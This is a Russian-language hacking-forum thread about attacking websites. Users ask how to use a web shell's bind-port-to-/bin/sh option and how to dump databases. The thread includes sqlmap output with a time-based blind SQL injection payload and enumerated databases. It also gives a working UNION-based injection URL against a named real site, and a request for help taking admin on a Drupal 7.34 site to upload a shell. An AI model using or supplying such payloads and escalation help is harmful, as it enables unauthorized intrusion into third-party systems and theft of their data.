Для чего в шеллах есть пункт "Bind port to /bin/sh [perl]", и порт указан 31337 ? Как и когда это использовать, объясните если не трудно
где можно почитать об этом подробней? я не до конца понимаю как это делается, нажать в шелле, а что дальше неизвестно)
дану? это где js library? а не подскажешь запрос как сдампить? плиз Не сказать что норм льется: http://i.shotnes.com/a/22/1uwpgh51.ozp_56281388e029e.png
sqlmap берет Code: --- Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=3' AND (SELECT * FROM (SELECT(SLEEP(5)))mWsI) AND 'FCqd'='FCqd --- [12:26:48] [INFO] the back-end DBMS is MySQL web server operating system: FreeBSD web application technology: PHP 5.6.0, Apache 2.4.10 back-end DBMS: MySQL 5.0.12 Базы: available databases [3]: [*] elektroline [*] information_schema [*] test
http://www.navistory.kr/shop/m_navi...M+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a) sqlmap как в нем таблици вытащить что то чар не пагет(
Code: http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=-1/*! and 1=1 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()*/+--
Ребята подскажите, есть сайт на Drupal 7.34. Нет доступа с правами администратора но есть доступ в качестве юзера. Есть ли у этой версии какие то уязвимости? как получить доступ к админу? хочу залить шелл и получить доступ к файлам.
Spoiler: Смотри тут https://www.cvedetails.com/vulnerab...387/version_id-181083/Drupal-Drupal-7.34.html